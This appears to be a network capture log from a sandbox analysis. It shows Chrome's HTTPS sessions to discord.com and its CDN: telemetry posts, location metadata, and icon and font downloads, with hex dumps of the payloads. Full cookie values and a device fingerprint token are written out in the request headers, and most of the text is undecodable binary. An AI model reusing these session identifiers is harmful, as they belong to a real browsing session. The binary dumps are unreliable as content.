                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 2a c6 2e 04 57 dd d9 09 dc 18 7c 46 e9 46 c1 48 64 57 d8 eb 83 b1 38 a5 85 ed e9 a2 59 e0 33 4c 37 4e 2a 93 6a ab 1b 42 fd 9b 68 3d ea 2e 77 24 57 c8 a7 9c 6e 9c cc 91 e9 1c 8d 9d 03 53 8c 11 f7 37 12 cd 03 9f 83 ba 71 0a b7 52 ef 6c 0a 0f 4e b3 66 32 dc 3d b1 02 f0 49 a9 1b a7 f2 e4 06 57 73 64 68 33 67 a5 e3 c3 1b 17 c0 67 a9 6e bc 84 af 30 ba 5b 36 0e cf f0 76 36 3d 7d 89 3f e0 d3 56 37 5e 2a 50 56 79 fc 5d 23 09 c1 c9 e7 97 3f 69 00 9f c7 ba 71 9a 50 65 f2 b6 76 8f 6e 11 dd 62 79 07 52 ff c0 27 b6 7e 6b a1 8b d4 66 5f 5b 0f d5 ad c0 4a 5b d5 38 a6 c1 0f 9a b4 7a 00 15 05 1e ee 45 ab b0 92 6a 6b ab bf 0f 7d 69 b5 44 dd a4 e8 63 80 41 86 19 61 8c 71 a6 c0 de e3 61 51 c5 95 f4 b9 c9 a6 9a 6e e6 ed 8b b5 f3 a1 78 a9 1f 2d c3 99 75 2f c1 5a db 6b 97 68 2f
                                                                          Data Ascii: *.W|FFHdW8Y3L7N*jBh=.w$WnS7qRlNf2=IWsdh3ggn0[6v6=}?V7^*PVy]#?iqPevnbyR'~kf_[J[8zEjk}iDcAaqaQnx-u/Zkh/
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: dd fe 8e d3 f6 b4 97 54 4f 42 7e 26 80 ae 76 46 6f 35 e5 45 a7 d7 94 9b 92 aa 65 a2 66 cc 47 a3 44 5b de e8 d2 e3 63 a2 71 f2 4a 25 9c 64 d2 c1 3b 9b 72 98 d4 33 cf 38 d3 cc 52 88 52 50 5e f9 14 5d e0 38 8a 2a a7 2d 6d 6b 7b 4f 14 73 b1 b7 75 f5 4e 1f 1a 69 bc 8f 4d b5 d1 d7 16 5b c5 d1 df 4e 00 09 59 44 08 28 2c f8 3d e6 19 91 58 b0 e4 43 4b 73 e2 bd 8f ab 3b 48 63 c9 f7 39 44 d3 21 9b 09 d6 64 e8 be a4 d8 5c 5a fd 4c a5 85 ce b4 96 76 5b a9 f6 2d 83 76 d3 6f a7 73 ed 67 d8 5e 46 fd e9 42 87 59 83 64 89 3b 93 8e b3 72 2a 62 47 11 70 65 8b 37 7b fc 2e 47 42 39 13 c9 89 70 2e 44 bb 44 2c 37 92 79 90 ce 9d 54 97 c9 14 49 3d 6f b0 22 9c 2e c6 d9 6e d2 2d 81 7e f1 f4 ba c5 b0 64 17 ba ed 7c 49 ce 95 c1 b4 74 26 a5 31 8e c1 b5 87 5c ca 62 de 63 e4 1e 70 ee 91
                                                                          Data Ascii: TOB~&vFo5EefGD[cqJ%d;r38RRP^]8*-mk{OsuNiM[NYD(,=XCKs;Hc9D!d\ZLv[-vosg^FBYd;r*bGpe7{.GB9p.DD,7yTI=o".n-~d|It&1\bcp


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          389192.168.2.550127162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:26 UTC781OUTGET /api/v9/auth/location-metadata HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=zTyHcYXle.ulldoKhDyuZdpCFGGhUOczyQR6YErOS08-1702226725668-0-604800000
                                                                          2023-12-10 16:45:26 UTC775INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 3b 20 70 72 65 6c 6f 61 64 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadvary: Accept-Encodingvia: 1.1 googleAlt-Svc:
                                                                          2023-12-10 16:45:26 UTC119INData Raw: 37 31 0d 0a 7b 22 63 6f 6e 73 65 6e 74 5f 72 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 70 72 6f 6d 6f 74 69 6f 6e 61 6c 5f 65 6d 61 69 6c 5f 6f 70 74 5f 69 6e 22 3a 7b 22 72 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 70 72 65 5f 63 68 65 63 6b 65 64 22 3a 66 61 6c 73 65 7d 7d 0a 0d 0a
                                                                          Data Ascii: 71{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}
                                                                          2023-12-10 16:45:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          390192.168.2.550128162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:26 UTC1789OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 415
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=.eY3G4IcyrsifYU_Mrxr6fjibcSrHXR8hLPWv4DLdVE-1702226726063-0-604800000
                                                                          2023-12-10 16:45:26 UTC415OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 72 65 67 69 73 74 65 72 5f 76 69 65 77 65 64 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 34 32 32 37 2c 22 72 65 67 69 73 74 72 61 74 69 6f 6e 5f 73 6f 75 72 63 65 22 3a 22 67 75 69 6c 64 5f 69 6e 76 69 74 65 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 49 6e 76 69 74 65 20 52 65 67 69 73 74 65 72 20 50 61 67 65 22 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e 63 65 5f 6d 65 6d 6f 72 79 22 3a 30 2c 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 66 65 61 74 75 72 65 73 22 3a 31 32 38 2c 22 72 65 6e 64 65 72 65 64 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 75 70 74 69 6d 65 5f 61
                                                                          Data Ascii: {"events":[{"type":"register_viewed","properties":{"client_track_timestamp":1702226724227,"registration_source":"guild_invite","location":"Invite Register Page","client_performance_memory":0,"accessibility_features":128,"rendered_locale":"en-US","uptime_a
                                                                          2023-12-10 16:45:26 UTC978INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:26 GMTConnection: closevary: Origin, Access-Control-Request-Method, Access-Control-Request-Headersaccess-control-allow-origin: https://discord.comVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          391192.168.2.550130162.159.133.2334435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:26 UTC654OUTGET /icons/933253328794689546/9b0ad1a7a2c911684a0e7e6e1e7bce2e.webp?size=64 HTTP/1.1
                                                                          Host: cdn.discordapp.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=MlB4tnQZAM3WNryiNii9Iogi72EVdzkBEwecfk3H410-1702226725-0-ATgvKef08NC0RJ+Yr/BbJTsIoJdclElUQiLQsv7HZtg+l0w1/NsvjZEfhwQYbNJPF9rReoqpsCnUSjjm58bZHl8=; _cfuvid=isArGSE2aHpc2axhBLAkuCMa4PoemTE38HWYU_tVO8o-1702226725948-0-604800000
                                                                          2023-12-10 16:45:26 UTC1251INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 39 20 44 65 63 20 32 30 32 34 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 31 36 20 4d 61 72 20 32 30 32 32 20 30 33 3a 34 38 3a 34 38 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 61 63 63 65 73 73 2d 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: image/webpContent-Length: 870Connection: closeexpires: Mon, 09 Dec 2024 16:45:26 GMTlast-modified: Wed, 16 Mar 2022 03:48:48 GMTcache-control: public, max-age=31536000access-c
                                                                          2023-12-10 16:45:26 UTC118INData Raw: 52 49 46 46 5e 03 00 00 57 45 42 50 56 50 38 20 52 03 00 00 d0 10 00 9d 01 2a 40 00 40 00 3e 6d 2e 92 47 24 22 a1 a1 2e 14 9a a8 80 0d 89 67 00 c8 db b2 a2 de 99 0b 6e 01 c0 2b b7 1a be 8d f9 f7 d4 27 a4 af a0 02 96 88 fe 9d 8f 46 fa 0f 6c 46 8a a6 cc ad b6 e2 e8 cd eb e7 fd 57 7d ac 3d 35 c3 ca 36 59 e7 e1 c2 04 c2 2a 5c 86 a2 e4 6f f1 46 9f b2 92 be
                                                                          Data Ascii: RIFF^WEBPVP8 R*@@>m.G$".gn+'FlFW}=56Y*\oF
                                                                          2023-12-10 16:45:26 UTC752INData Raw: a6 0d 4e 89 b0 ff 7f 00 4b 35 59 c8 2e 72 fb 28 fb 8c 75 ba 6c c5 46 0e 5d 84 b4 62 df c6 a4 36 34 ee 7b de fa d8 ce 6f e6 f1 50 21 80 00 9e 0c 0e 86 5c fb 30 9a e6 c4 0b c5 8f 5b 04 0c c0 b2 06 19 53 81 85 fc c9 2a 57 58 26 4e 1d f3 48 a7 7f 6c a0 4e 79 87 1f 18 4d 24 ba 40 b8 37 08 63 eb e4 6f 56 4c 12 13 94 18 2d 78 27 d8 5b ea 1b 7b a8 0e 54 82 2b da 70 f4 77 cd ff 1f 65 45 ef aa 3a 89 ec 46 5e 0e 7b 55 c1 63 ef 1b 7a ee 95 84 cc 93 19 75 b0 14 66 69 71 02 0b 70 f7 4a f3 13 90 89 f0 3c 29 6e 3e c7 26 cc a8 80 42 34 16 dc 20 b9 c5 a3 14 83 5a 37 94 a6 58 76 71 06 43 46 a9 35 d2 89 29 93 46 08 d4 61 95 63 01 d8 8c 82 80 df e8 b8 a7 c8 3b d9 02 f7 cc 3f 7e ea 3e ae 93 81 8e 1b b0 27 67 0b 27 96 b1 5f e4 d3 6e a8 c2 6f 08 e3 8c d8 98 7c 3d b5 d2 52 56 57
                                                                          Data Ascii: NK5Y.r(ulF]b64{oP!\0[S*WX&NHlNyM$@7coVL-x'[{T+pweE:F^{UczufiqpJ<)n>&B4 Z7XvqCF5)Fac;?~>'g'_no|=RVW


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          392192.168.2.550129162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:26 UTC1016OUTGET /assets/f84e3e81b8d0718cd917.woff2 HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://discord.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://discord.com/assets/app.83f01b3df65cd0fa3bb9.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=sM3CcK_Ls.KLz5RX5asA1UG2Y9ys.WepQPYhcwtAneI-1702226725746-0-604800000
                                                                          2023-12-10 16:45:26 UTC955INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 66 6f 6e 74 2f 77 6f 66 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 39 34 32 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 35 31 36 62 62 30 32 35 37 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f 6e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: font/woff2Content-Length: 39424Connection: closeCF-Ray: 8336f5516bb0257d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Con
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 00 9a 00 00 11 00 00 00 01 7c 60 00 00 99 9b 00 02 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 04 1b 81 a7 5a 1c a0 20 06 60 00 8e 50 08 82 42 09 8d 57 11 0c 0a 83 98 2c 82 dc 55 01 36 02 24 03 99 60 0b 8c 72 00 04 20 05 93 6e 07 b4 46 0c 83 35 5b ea 56 91 00 d6 6e bb 3c 92 00 6a 1b 02 14 f5 91 a5 9d 6e 08 d5 e0 0d 47 f1 ae f3 d6 ab 54 80 0c a8 61 73 6a 11 fb a1 6e 56 01 96 57 dd f8 cc fe ff ff ff cf 4c 36 c6 30 0e eb 00 55 2b 9b b5 b6 fd 0b 35 0a 4d 33 67 78 2e 19 6a 80 49 63 f7 26 2e c1 2d 20 9c e4 ee 3c 22 87 96 c7 f9 72 9c cc 4e 28 42 b1 cb 30 a4 de 32 60 8b d0 28 54 49 30 7c 8f 4e ca be 1f 6e 60 c2 d7 be 57 8c 83 62 d0 0d f9 18 7c 98 67 58 2e a5 84 bf 3d 7b 9e c5 fb 53 5c 2a 91 b2 43 ab 84 b0 4a
                                                                          Data Ascii: wOF2|`BZ `PBW,U6$`r nF5[Vn<jnGTasjnVWL60U+5M3gx.jIc&.- <"rN(B02`(TI0|Nn`Wb|gX.={S\*CJ
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 23 7d d5 72 28 63 4c 24 05 11 45 39 37 b5 51 a8 88 d3 ff 37 30 60 b3 77 17 c4 40 8e 3b 32 d6 0e 08 4a 02 48 59 4a 67 e2 8b 6c 92 38 1b 84 c9 45 17 84 67 a2 4a 5b 63 dd 17 72 a1 29 94 36 4c 0b 48 54 9f 9f 26 aa 33 91 df 61 30 38 e0 c3 45 06 f2 01 9f 78 a0 ed 73 6f 4a bf 67 ff 73 69 29 52 3a ac 38 80 9d 8e 85 2d 0d a2 3a bd 51 da 26 1d d5 e1 41 06 2c 36 d2 3b a3 b0 3f 26 34 08 04 fe 9d 46 96 f7 45 ec 66 53 08 61 c4 62 c4 60 8c 98 a2 bc fa 76 7b ff fb 48 0b ba fb ee 7d 94 32 94 43 91 e2 4a 90 20 21 1b 82 23 52 ca 50 ce fa b7 f0 38 b3 78 fb a4 6e fb 10 7c 08 22 18 23 8c 30 c2 18 13 c2 fc bd 87 53 e1 eb 4a 3e 99 7f 3b af 28 e3 69 a5 b5 51 22 62 97 fd b2 af 09 04 3c c7 81 14 69 45 2b f7 db eb fa dd 9f fd b4 da 67 74 4c 63 4a 63 b3 86 28 41 d4 27 20 22 62 b9 f2
                                                                          Data Ascii: #}r(cL$E97Q70`w@;2JHYJgl8EgJ[cr)6LHT&3a08ExsoJgsi)R:8-:Q&A,6;?&4FEfSab`v{H}2CJ !#RP8xn|"#0SJ>;(iQ"b<iE+gtLcJc(A' "b
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: cc 4c 5e ff 99 09 2e 55 4d cb 57 4e ec b6 93 05 b3 31 7a 03 af a0 01 58 62 40 2f 05 16 8f a8 c2 d3 85 a2 9d 16 cc 37 f5 ea d9 d4 ea c1 fb 98 32 17 45 96 4e ae d8 47 ac 86 0f 57 ba 2c 8a 45 60 8a 0d 71 60 8f 72 71 c6 e5 f0 ce 6a 8b 6c ff b6 a2 76 ee 8b 68 12 94 5d 91 11 55 14 d0 c7 38 53 8e 0b e9 78 72 01 53 d1 a0 c4 c7 82 26 6b c2 6e 69 e1 ba df bd 35 9f 78 e0 6f 1f b4 9d ee 1e 19 c6 ca d4 be f0 b1 f8 46 ee 26 48 66 41 5a f0 eb 33 8a 54 45 2d 1b 0b 15 79 0c bc 49 d1 bf ff 2c 7d c1 70 c6 eb 44 9c 66 b9 3f 42 3a 10 97 a0 6f 68 d4 74 14 bd 82 a1 e2 f0 49 f9 fa 88 8c e4 15 b6 14 b5 bf 2d 62 22 0f 65 d4 aa 74 fe 91 cd a0 07 2a ac 70 68 3b b4 29 be 9e fe 23 a9 00 e4 40 d3 53 69 17 55 0a 0e 56 24 c6 24 b6 a8 3d 42 74 b6 c5 2c 8d 35 ea e4 0a bc d8 2a 6d f8 33 8c
                                                                          Data Ascii: L^.UMWN1zXb@/72ENGW,E`q`rqjlvh]U8SxrS&kni5xoF&HfAZ3TE-yI,}pDf?B:ohtI-b"et*ph;)#@SiUV$$=Bt,5*m3
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 26 1b 43 f4 6c 52 3d 0c 00 80 ab 82 02 45 e9 19 81 b1 1c 41 7b 00 2e d2 dd b9 15 34 60 01 db f4 8b b7 fd fd 5a f7 85 45 6e bc c8 03 cf fe 4d dc b7 3c ff 5b b5 21 17 9b ed 4a d7 99 ef 1f bc d6 ec 36 0b 2d b6 c4 43 f1 5c 58 1c a0 20 40 40 c4 d9 51 6b 6d dd 4c 50 7b 60 dd bd 9d db dc e7 39 2f 82 ac bb 63 f1 ee 4c 0d f7 47 fc fb ad cb 57 5c e3 55 77 e5 f6 d7 44 95 ab f7 4b cd 77 1a 41 0c 25 0a e0 04 39 22 c9 53 28 53 67 33 e4 29 52 64 b2 12 fb 4c 71 40 a3 ed 1e 79 a4 41 93 5f dc f6 27 08 f8 90 11 1a fd 0b b9 bd 05 96 55 4e 69 10 1f bf 6c 72 53 fb 3a f5 be 6d 7a df a7 d9 cc 66 37 b7 9f fb bd 3f 9b 3f 00 0d 25 94 52 86 72 28 4b b9 94 47 f9 54 40 25 d4 fa 20 8f d5 b1 3d a8 83 3e 98 83 3d ce c7 e5 b8 9e a5 c7 ed b8 1f 8f e3 79 bc 0e ee 78 53 01 bb 7f d6 c3 eb e1
                                                                          Data Ascii: &ClR=EA{.4`ZEnM<[!J6-C\X @@QkmLP{`9/cLGW\UwDKwA%9"S(Sg3)RdLq@yA_'UNilrS:mzf7??%Rr(KGT@% =>=yxS
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: ba 08 b4 f0 07 da ec f5 4b 75 d9 4a 98 9e 02 bf ac 92 93 9c 46 04 e2 0e eb a9 4e 22 48 13 d0 7c c0 b8 4e 02 2a 17 22 6a 27 99 71 6b 1e e1 cc 1a a3 87 89 ca b3 bc 2a b3 2d de ae 08 8a 6d 11 bc 27 aa 8b 52 66 17 b5 ca 0d 43 04 2a 8b 95 44 58 3d 7a 07 db d8 c3 01 b9 10 5b 03 32 04 0d 28 70 65 69 58 d9 1b 4e 65 8f 69 a1 ce 20 98 6c 2b 07 e1 13 9b ad 56 bd 1a 2b 31 52 d5 72 bb e3 9a 90 4a 9a 67 de a5 7e 0d 6b 44 89 80 65 b0 3a 5a 5e a0 09 5e b9 e5 5e 6e b9 18 91 dd 3d 79 14 4e 18 ea 9d 43 21 b2 19 ed 84 33 b4 5b dd 8a b9 9c 89 68 ba b2 71 12 2d 13 43 0f 61 b8 4e e6 5d c5 72 7c 90 3b 3a c0 f2 27 da 44 31 f7 2f bd 93 9a 74 03 54 da 79 f1 9d d5 a0 c6 18 c4 ce 7d c0 7e 6e b5 55 db f9 07 8e ce 9d b5 ca 71 99 aa ae 48 37 57 a4 31 d2 05 0b ab 15 d6 09 86 15 0a ab 12
                                                                          Data Ascii: KuJFN"H|N*"j'qk*-m'RfC*DX=z[2(peiXNei l+V+1RrJg~kDe:Z^^^n=yNC!3[hq-CaN]r|;:'D1/tTy}~nUqH7W1
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: e7 59 01 4d d4 53 e8 1d 05 8d 50 0f 3d a4 67 89 14 35 9a 26 46 28 96 f5 f0 dd ce 97 3f 65 44 7b 50 d4 b5 e9 b2 22 07 97 5d 94 5f 5b ca 8c a4 15 08 82 93 89 77 11 42 7a 94 f5 18 ae bf b9 86 ab a9 b6 dd 12 0d d1 36 b1 3c 5a 60 6a 90 79 19 b1 15 2c 68 8c 7a 9b a0 00 07 35 da 27 9e 36 44 86 7f ee aa 99 55 a0 92 d6 82 a0 53 d4 ec 2b 65 5c 1d 15 6f 62 b7 c0 af b4 bd 23 58 20 86 a4 fe f8 6e 0b 5e b9 2b 28 23 66 93 c8 9d fe 92 66 78 57 1b 6f 19 cd a5 e3 74 94 5b 8f b0 02 88 28 85 6e 1d d5 0b 2a e8 e0 90 68 53 c4 48 c0 eb 2c 99 e0 a7 a6 24 3b 7c 56 51 c7 d2 01 c7 4f be bb fc 19 19 65 6e 2a aa a9 ea 76 e2 3c 56 df 1a b9 51 1b 6f 13 4d 0e 7a 19 71 4f 5a 0b 09 ea c3 56 40 87 ef 8a 00 d4 f5 7b 4b a2 31 82 57 90 93 2a d1 84 d2 a5 dd 22 c3 f9 bb ea 30 18 91 ad 43 af 40
